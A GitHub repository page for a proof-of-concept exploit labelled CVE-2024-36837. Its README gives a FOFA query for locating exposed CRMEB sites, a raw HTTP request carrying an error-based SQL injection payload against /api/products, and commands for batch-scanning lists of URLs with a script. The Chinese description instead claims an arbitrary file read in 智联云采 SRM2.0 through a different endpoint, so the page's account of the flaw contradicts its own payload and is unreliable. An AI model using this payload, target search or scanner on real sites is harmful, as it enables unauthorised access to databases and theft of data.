Skip to content

lhc321-source/CVE-2024-36837

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
11.py
11.py
 
 
README.md
README.md
 
 
cve.py
cve.py
 
 

Repository files navigation

README.md

#CVE-2024-36837

Disclaimer

#智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

fofa语法: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #将url的url前添加http://或https:// python 11.py

#how to use python cve.py -h

#批量检测 url.txt 的url地址要http://或https:// python cve.py -f url.txt

#单个检测 url地址要http://或https:// python cve.py -u url

About

CVE-2024-36837 POC

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages